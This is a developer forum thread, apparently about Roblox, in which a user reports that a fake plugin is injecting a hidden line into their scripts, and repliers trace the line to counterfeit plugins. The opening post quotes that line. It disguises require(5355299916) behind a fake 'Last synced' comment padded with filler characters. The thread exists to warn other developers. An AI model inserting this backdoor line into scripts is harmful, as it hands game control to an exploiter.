Virus that adds a require line of code into innocent scripts

It adds this exact line at the end of every script:
--[[ Last synced 8/15/2020 01:00 ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������]] require(5355299916) --[[ ]]--

This must be some sort of suspicious plugin, right? Once we had an exploiter who literally spoke for me and messed around with my chat box, the chat box said “you’re mine now b**h” (without a t). Once I was finally in a server with the guy, and he was invisible. But, I could see him with a night vision admin command. He even went to the point of giving death threats to players, and trust me, I wouldn’t hesitate to :sparkles: s n a p h i s n e c k :sparkles: (I didn’t catch his username, RIP.) What is doing this? It’s odd that it even tells you when the virus has been added… (I think this one is inaccurate because I surely would’ve seen it before)

5 Likes

Reddit - Dive into anything well this exists, nice

what plugins do you have installed

1 Like

I found the cause… from the other dev’s plugins

this mother :truck:er so sneaky (find the incorrect creators)

2 Likes

Be very careful with your plugins. Whenever you get any plugin, make sure it’s from the original creator, not some fakers pretending to own the plugin just to put viruses in your game, leaving it vulnerable to the biggest pieces of :poop: alive…

8 Likes

I think another one of your plugins might be malicious:

The creator looks like a script kiddie. Joined 3 months ago, has no followers, friends list looks like its full of throwaway accounts, only groups look like edgy exploiter groups.

1 Like

Oh shoot diddily darn thank you

I found the OG gapfill :slight_smile:
RobloxCreativeMind my :peach: more like ScamBotMind